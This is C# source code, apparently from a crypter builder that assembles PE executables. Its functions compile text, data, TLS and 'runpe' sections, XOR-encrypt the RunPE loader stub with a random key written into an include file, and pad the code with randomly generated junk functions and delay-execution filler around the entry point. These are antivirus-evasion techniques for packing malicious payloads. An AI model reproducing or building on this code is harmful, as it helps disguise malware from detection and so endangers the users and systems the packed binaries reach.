private static void CompileSection(string SectionName, NewPE _PE) { string SectionSourcePath; string SectionObjPath; switch (SectionName) { case "text": SectionSourcePath = _PE.PeDirectory.TextSectionPath; SectionObjPath = _PE.PeDirectory.TextObjectPath; break; case "data": SectionSourcePath = _PE.PeDirectory.DataSectionPath; SectionObjPath = _PE.PeDirectory.DataObjectPath; break; case "idata": SectionSourcePath = _PE.PeDirectory.IDataSectionPath; SectionObjPath = _PE.PeDirectory.IDataObjectPath; break; case "bss": SectionSourcePath = _PE.PeDirectory.TLSSectionPath; SectionObjPath = _PE.PeDirectory.TLSObjectPath; break; case "runpe": SectionSourcePath = _PE.PeDirectory.RunPESectionPath; SectionObjPath = _PE.PeDirectory.RunPEObjectPath; break; case "main": SectionSourcePath = _PE.PeDirectory.MainPath; SectionObjPath = _PE.PeDirectory.SavePath; break; default: SectionSourcePath = string.Empty; SectionObjPath = string.Empty; break; } if (File.Exists(SectionObjPath)) File.Delete(SectionObjPath); ProcessStartInfo psi = new ProcessStartInfo(); psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"", _PE.PeDirectory.RootDirectoryPath, SectionSourcePath, SectionObjPath); psi.FileName = _PE.PeDirectory.CompilerPath; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; using (Process Proc = Process.Start(psi)) { using (StreamReader sReader = Proc.StandardOutput) { string res = sReader.ReadToEnd(); } } }
public static void FixDecryptorLoop(NewPE PE) { string RunPELengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc"); string Format = "RUNPE_CODE_LENGTH EQU 0x{0}"; if (File.Exists(RunPELengthInclude)) File.Delete(RunPELengthInclude); Format = string.Format(Format, PE.PeDirectory.RunPEObjectPath.ReadBytes().Length.ToString("X8")); File.WriteAllText(RunPELengthInclude, Format); PEFactory.CompileTextSection(PE); }
public void WriteDelayExecutionTrash(xNewPE PE, bool bLong) { string[] olaf = PE.PeDirectory.DelayExecutionIncPath.ReadLines(); byte[] trash_buffer; if (!bLong) { int len_trash = Rand.Next(0x100, 0x120); trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0); } else { int len_trash = Rand.Next(0x100, 0x120); trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0); } for (int i = 0; i < olaf.Length; i++) { if (olaf[i].Contains("0x69")) { if (!bLong) olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(25, 50).ToString("X8"))); else olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(3500000 * 5, 6000000 * 5).ToString("X8"))); } if (olaf[i].Contains(";[JUNK_NO_PRESERVE]")) { if (!bLong) { olaf[i] = trash_buffer.ToASMBuffer(); } else { olaf[i] = trash_buffer.ToASMBuffer(); } } } File.Delete(PE.PeDirectory.DelayExecutionIncPath); PE.PeDirectory.DelayExecutionIncPath.WriteLines(olaf); }
public static void EncryptCodeAndAddKey(NewPE PE) { byte[] pKey = new byte[16]; Keys.PopulateBuffer(pKey); byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes(); Xor.EncodeDecodeData(pRunPE, pKey); if (File.Exists(PE.PeDirectory.RunPEObjectPath)) File.Delete(PE.PeDirectory.RunPEObjectPath); PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE); string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc"); string Format = pKey.ToASMBuffer(); if (File.Exists(KeyInclude)) File.Delete(KeyInclude); File.WriteAllText(KeyInclude, Format); PEFactory.CompileDataSection(PE); }
public void WriteLogicalFunctionsToTextSection(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier) { string TxtSect = PE.PeDirectory.TextSectionPath.ReadText(); int size_pre_ep = 0; int size_ep = 0; int size_post_ep = 0; int pre_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier); int post_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier); // pre - ep for (int i = 0; i < pre_ep_func_cnt; i++) { int index_of = TxtSect.IndexOf(";[PRE_EP_FUNCTIONS]"); if (index_of > -1) { int func_len = Rand.Next(0x120, 0x200); byte[] func_buffer; if (Rand.NextDouble() >= 0.5) func_buffer = new DataConstructor().GenData(func_len, func_len); else func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000); // GenerateLogicalFunction(func_len, 0, 0, 0, 0);//GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000); // Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer)); // pad entropy with zeros after func //int pad_len = Rand.Next(0x10, 0x25); //Array.Resize(ref func_buffer, func_buffer.Length + pad_len); TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine); size_pre_ep += func_buffer.Length; } } JCI.SIZE_PRE_EP_FUNCTIONS = size_pre_ep; // ep - { int index_of = TxtSect.IndexOf(";[EP_FUNCTION]"); if (index_of > -1) { int func_len = Rand.Next(0x120, 0x140); // const byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000); // pad entropy with zeros after func //int pad_len = Rand.Next(0x10, 0x25); //Array.Resize(ref func_buffer, func_buffer.Length + pad_len); TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine); size_ep += func_buffer.Length; } } JCI.SIZE_EP_FUNCTION = size_ep; //// post - ep for (int i = 0; i < post_ep_func_cnt; i++) { int index_of = TxtSect.IndexOf(";[POST_EP_FUNCTIONS]"); if (index_of > -1) { int func_len = Rand.Next(0x120, 0x200); byte[] func_buffer; if (Rand.NextDouble() >= 0.5) func_buffer = new DataConstructor().GenData(func_len, func_len); else func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000); // Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer)); // pad entropy with zeros after func //int pad_len = Rand.Next(0x10, 0x25); //Array.Resize(ref func_buffer, func_buffer.Length + pad_len); TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine); size_post_ep += func_buffer.Length; } } JCI.SIZE_POST_EP_FUNCTIONS = size_post_ep; // PAD ENTROPY //int size_of_entropy_pad = 0x200; ;// ALIGN_UP(Rand.Next(0x200, 0x1000), (int)PE.NtHeader.OptionalHeader.FileAlignment); //byte[] zero_fill = new byte[0x1000]; //string path_inc = Path.Combine(PE.PeDirectory.IncludeDirectory, "zerofill.bin"); //path_inc.WriteFile(zero_fill); // JCI.SIZE_ENTROPY_PAD = (size_of_entropy_pad * 2); if (File.Exists(PE.PeDirectory.TextSectionPath)) File.Delete(PE.PeDirectory.TextSectionPath); PE.PeDirectory.TextSectionPath.WriteText(TxtSect, StringEncoding.ASCII); GC.Collect(); }